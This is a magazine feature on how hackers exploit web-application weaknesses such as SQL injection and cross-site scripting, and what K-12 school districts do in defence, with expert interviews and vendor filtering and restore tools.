IT Security: Target: The Web
##AUTHORSPLIT##<--->
No longer focused on the network,
hackers have a bull's eye now trained
squarely on web-based applications.
What, if anything, can school districts
do to thwart them?
IN DECEMBER, MICROSOFT ANNOUNCED a major security flaw affecting
its Internet Explorer web browser. The flaw allowed hackers to use hidden computer
code they had already injected into legitimate websites to steal the passwords of
visitors to those sites. Reportedly, more than 10,000 websites were infected with the
destructive code by the time Microsoft came forward with the news.
The announcement grabbed big headlines, emerging as it did during the Christmas
season while unsuspecting online shoppers were clicking away. As Eric Schultze, CTO
of Roseville, MN-based patch-management solutions provider Shavlik Technologies,
explained it, hackers were exploiting legitimate websites via SQL injection techniques.
"This means that visiting supposedly safe websites can lead to compromise via this
IE flaw," Schultze said at the time. "Attackers were able to exploit poor SQL coding
practices on these 'legit' sites that enable hackers to inject evil code on the websites."
The fix was simple enough, and Microsoft provided a downloadable security patch
in record time. Schultze described the company's reaction to the vulnerability as an
"all-hands-on-deck response" that was "quite disruptive to its own processes." But the
flaw gave critics of the Redmond, WA-based technology empire an excuse to engage
in some full-throated Microsoft bashing.
Lost in the hubbub and faultfinding, says web-application security expert Billy Hoffman,
was a larger problem.
"These kinds of exploits come and go," Hoffman says.
"Next, it'll be a Firefox flaw. A couple of weeks ago it was a
problem with QuickTime. At the end of the day, the interesting
thing about this IE security issue is that it wasn't about
somebody e-mailing you a trojaned WMF image file. Now
attackers are setting bear traps on websites."
Hoffman manages HP's Web Security Research Group.
Formerly a security researcher for SPI Dynamics (which HP
acquired in 2007), he earned hacker street cred during his college
days at Georgia Tech when he uncovered a security flaw
in the school's magnetic ID card system. He later developed a
suite of research tools for capturing, modifying, and validating
data from magnetic stripe cards, called Stripe Snoop.
"Bad software is the root of all evil.
And it's the true root of most IT security problems."
"Within a day or two, at least 6,000 websites had been
hacked," Hoffman says, explaining the lethal swiftness of the
IE attack. "That's an extremely fast turnaround time. Hackers
were able to act that quickly because these websites had
already been compromised. They had exploit kits just sitting
there on the web servers, and the attackers just basically
updated them to begin serving this IE exploit. It shows how
automated these exploits have become." (Exploit kits are software
tools that hackers create
and use for computer attacks.
MPack, IcePack, and Neosploit
are among the best known.)
Hoffman sees the speed with
which attackers exploited the IE flaw as emblematic of a
frightening trend-- one that is colliding with an even scarier
one: Hackers are targeting weaknesses in the application layer.
And they are not planting the usual viruses or trojans that can
be screened out with a firewall, but are revealing an emerging
species of attack growing out of the inherent nature of applications
that live on the web. "Hackers have compromised hundreds
of thousands of legitimate websites through web-app vulnerabilities,"
Hoffman says, "and they are using those compromised
sites to serve malware to visitors."
This is a worrying development for educators who use online
educational software and content. What can K-12 technology
managers do to cope with this new line of cyber attack?
Controlling the Uncontrollable
"Unfortunately, there's really not much you can do," Hoffman
says, "because attackers are starting to target sites you trust. USA
Today's website was used to serve malware earlier this year. It's
not like you can say, 'Don't visit sites that have URLs ending in
.ua for the Ukraine.' You can get hit on legitimate sites."
There may not be much a district can do, but there is something,
says Paul Myer, senior vice president of corporate development
at Orange, CA-based security solutions provider Marshal8e6.
(The company is a merger of the two internet security firms
Marshal and 8e6 Technologies, a deal struck last November.)
Web-app vulnerabilities, Myer says, are part of the evolving
landscape of threats, and cyber security evolves right along with
it. A case in point he cites is Henrico County Public Schools,
which found at least part of the answer in a filtering tool it
employed to protect students in its 1-to-1 laptop program from
inappropriate and malicious web content. In 2001, the Richmond,
VA, district began distributing laptops to its teachers,
staff, and secondary students. By 2007, the school had gotten
laptops into the hands of approximately 27,600 middle and
high school students and teachers at 66 schools.
To provide security for the program, and in particular to
comply with the Children's Internet Protection Act (CIPA),
which mandates that federally funded schools install internet
filters to protect students from unsafe online content, the district
turned to Marshal8e6. The vendor's Mobile Client program,
which Henrico County deployed, is designed to prevent off-site
students from accessing inappropriate content (pornography, hate
speech, etc.), but also from malicious, web-based code.
"In education you have an interesting confluence of factors,"
says Myer. "You have curious students with lots of imagination,
good equipment at their fingertips, and lots of time on
their hands."
"We shouldn't use the developers as the scapegoats.
Remember, they’re paid for features and speed, not security."
And they have MySpace, which hit the district's network
like what Henrico County Systems Administrator Jason Cope
calls an overnight explosion. Through MySpace, students have
unlimited access to e-mail, instant messaging, blogs, and
photo galleries. "Suddenly, everyone was trying to use
[MySpace], and there was a plethora of hits to multiple points
of entry for the site," Cope says.
The increased traffic degraded the district's internet access to
educational applications and increased its exposure to malicious
code. Henrico County eventually turned to another Marshal8e6
product, the R3000 internet filter. The standalone filtering
appliance utilizes a pattern-detection capability to sort out and
block three types of web applications: streaming media applications,
remote access control applications, and online games.
The same strategy lies at the heart of San Ramon, CA-based
Faronics' literally named filtering tool, Anti-Executable,
designed specifically to shield school computers from malicious
executable code. The product works from a white list, a roster
of authorized programs that district tech managers and IT
administrators control.
"If an executable shows up and it's not on the white list, the
product keeps that code from running," explains company
spokesperson Dheeraj Mahtani. "We think this approach is especially
useful in K-12 environments. It ensures that students have
access to the productive programs they need while preventing
anything that's unwanted in the classroom from running."
Along with Anti-Executable, Faronics offers a product called
Deep Freeze that allows users what you might call a do-over in
the event of a strike from hackers. Upper Dauphin Area School
District uses both tools to secure its students' computers.
The district comprises an elementary, middle, and high
school located in Elizabethville, PA. It supports 500-plus student
and teacher workstations running Microsoft Windows
XP, and 19 servers. Tainted software had become an especially
serious problem in the high school computing labs, according
to district Technology Director Bryan Campbell. The advanced
computing abilities of some ill-intentioned students allowed
them to create larger workstation disruptions, Campbell says.
The district's effort to "bring control to an uncontrolled
environment," as he terms it, was straining its IT resources.
Software that restricts what users can do and access did help
the district prevent several forms of system damage-- for a
while. But Campbell says this approach was difficult and
time-consuming, and at the end of the day, the students were
just too adept at circumventing it.
Deep Freeze is a reboot-to-restore tool that takes a snapshot
of the computer and "freezes" it into a protected state. Any
changes made to that snapshot can be undone by the program
and the computer returned to that original frozen state.
"It's just a fact that computers in education environments are
among the toughest to manage and secure," Mahtani says. "Lots
of different daily users and limited on-site staff support for what
are often large numbers of machines create a kind of IT perfect
storm. Deep Freeze allows administrators to set up a machine
and walk away. The protection takes place on the restart."
Are Programmers to Blame?
The rise of web apps as the No. 1 avenue of malicious hacker
attack is old news to Gary McGraw, who has been preaching
application security for years. He's the author or co-author of
six bestselling books on the subject, including the now-classic
Exploiting Software: How to Break Code (Addison-Wesley
Professional, 2004), which he wrote with Greg Hoglund, the
founder of Rootkit.com, a clearinghouse of information about
rootkits and anti-rootkits. His latest book, also written with
Hoglund, is Exploiting Online Games: Cheating Massively
Distributed Systems (Addison-Wesley Professional, 2007).
McGraw is also the CTO of Cigital, a Dulles, VA-based
provider of software quality and security solutions.
Why Web Apps Are So Vulnerable
WEB APPLICATIONS HAVE BECOME RIPE for attack thanks in part,
some computer security experts say, to the enormous popularity of a
development technique known as Ajax, which utilizes the JavaScript
dynamic scripting language.
Ajax creates highly interactive web pages through the combination
of several technologies in addition to JavaScript, including
XML and HTML.
And therein lies the problem, says security expert Brian Chess.
"JavaScript is very hard to secure, and nowadays it's everywhere
on the web," he says. "And the fact that Ajax proponents are not
acknowledging the problem isn't making it any easier.We need to
stop teaching people to make use of these new web technologies
while pretending that there are no security considerations.With new
technologies comes a new set of threats."
Veritable throngs of web-app developers are now using Ajax to
improve the responsiveness of web pages by automating the exchange
of information between browsers and servers. The result has been a
greatly improved user experience-- and an unexpected vulnerability. In
2006, attackers began using JavaScript to exploit cross-site scripting
(XSS) vulnerabilities in dynamic websites. In an XSS attack, a web
application is used to send malicious script to an unsuspecting end
user through his browser. Because the user's browser has no way of
knowing that the code did not come from a trusted source, it runs it,
giving the attacker access to cookies, session tokens,
and other sensitive information. What's the consequence
for the website visitor? Theft of data,
mainly. And there will be no hint of trouble, so
he won't know he's been compromised.
According to Wikipedia,
as of 2007, cross-site scripting carried out on
websites made up about 80 percent of all documented
security vulnerabilities.
"Bad software is the root of all evil," McGraw says. "And
it's the true root of most IT security problems." These days, he
explains, the black hats aren't getting at you by breaching
some network security mechanism, but by leveraging the
functionality of an application.
"For many years, security was about operations-- about
infrastructure and the people who keep the network going,"
McGraw says. "Today the problem is about the vulnerable
software the operations managers have to deal with. They get
this broken stuff, and they know it's broken, but they don't
know how to fix it because they're not software guys, so they
just put something around it, like an application firewall, or
maybe they poke it a couple times to see how broken it really
is with some black-box testing tools. Unfortunately, operations
cannot solve this problem. The only people who can solve it
are the software builders of the world."
Brian Chess, chief scientist
and co-founder of Fortify Software,
a Palo Alto, CA-based
provider of enterprise application
security solutions, agrees. "Whether they know it or not, computer
security is largely in the hands of programmers," he says.
Chess is the co-author of Secure Programming With Static
Analysis (Addison-Wesley Professional, 2007), which he wrote
with Jacob West, and his work at the University of California-
Santa Cruz led to the development of Eau Claire, a framework
for detecting and eliminating security vulnerabilities in software.
"One of our problems with security these days is that it's just
too darned hard," Chess says. "It's very difficult to write a program
that's secure. We're all about helping developers get it right
the first time, but it's a big challenge for everyone. If there were
some easy, take-a-pill kind of solution to the software security
problem, you'd better believe everyone would be doing it."
Many application-layer attacks are aimed at certain well known
but unfortunately still common types of coding errors
pertaining to the way web applications process input from
website visitors, HP's Hoffman explains. "A simple e-commerce
application typically asks users for various kinds of information--
passwords, addresses, etc.-- and without the appropriate
safeguards, hackers can try to use those input fields to pass
malicious instructions to the host computer."
In their latest quarterly report, security analysts at Santa Clara,
CA-based Cenzic Intelligent Analysis Lab stated that SQL injection
(34 percent) and cross-site scripting (23 percent) are the two
most common ways hackers poison web-based applications with
malicious code. The study also found that vulnerabilities in
media players are causing a widening security hole that school
districts need to be aware of, given the role that media players
have in presenting online educational content. These programs
account for between 2 and 5 percent of the total web-application
vulnerability volume during any given quarter, Cenzic reports.
Seven percent of those vulnerabilities pertain to web servers,
and 4 percent to web browsers. And it wasn't Internet Explorer
that was the most at risk, but Mozilla's Firefox browser, which
had the most vulnerabilities by far at 41 percent. The Opera
browser was second at 26 percent. IE accounted for just 17
percent of the vulnerabilities. Apple's Safari browser had the
lowest number of reported vulnerabilities at 16 percent.
Security consultant and trainer Dinis Cruz recognizes the soft
spot in the application layer, but he stops short of putting the
onus on the developers. Cruz, who specializes in web application
security, is the chief security evangelist of the Open Web
Application Security Project, an open web-based community
focused on finding and fighting the causes of insecure software.
"We're in the process of building a world in which all the code
we run on our websites has the power to access all of our assets
from our desktops and servers," Cruz says. "From a security
point of view, this is a very bad development. But we shouldn't
use the developers as the scapegoats. They often simply don't
have enough visibility into what they are creating to evaluate
the security of an application. And remember, they're paid
for features and speed, not security."
"I don't want to blame the developers
either," Chess adds. "There isn't a
great roadmap through Web 2.0 territory,
so there's this temptation to pretend that you can take care
of the security part later. But if there's one thing history tells us,
it's that that kind of thinking can really get us into trouble."
Cruz is especially worried about the new web-app frameworks--
such as Adobe's AIR (Adobe Integrated Runtime), Sun's
JavaFX, and Microsoft's Silverlight. "The feeling now is, hey,
the new paradigm is just the desktop application," he says. "The
user installs it and clicks yes, so the vendor is covered, but then
those things have access to all the user's resources."
"Ultimately, it's the developer who has to fix this," HP's
Hoffman says. "The IT security guys are doing their job. They set
up firewall rules, secure the perimeter, and implement anti-spam
and antivirus protection. But they're just securing the infrastructure
that's serving you an application. If that application
is broken, old, or insecure in some way, there's no magical
box that your IT guy can [install] to protect you.
"This is the world we now live in," Hoffman goes on.
"Attackers are using web-app vulnerabilities to compromise
sites, and then use those sites to lay land mines or bear traps to
nail unsuspecting people coming by. There's always going to be
this game of Whack-a-Mole around IE exploits-- or QuickTime
or Firefox or Flash. But if we can secure these applications--
these online services that everyone uses and trusts-- there won't
be any platforms for people to get attacked from."
::WEBEXTRAS ::
If you would like more information on IT security, visit
our website at www.thejournal.com. In the Browse by
Topic menu, click on Security/Privacy.
John K. Waters is a freelance writer based in Palo Alto, CA.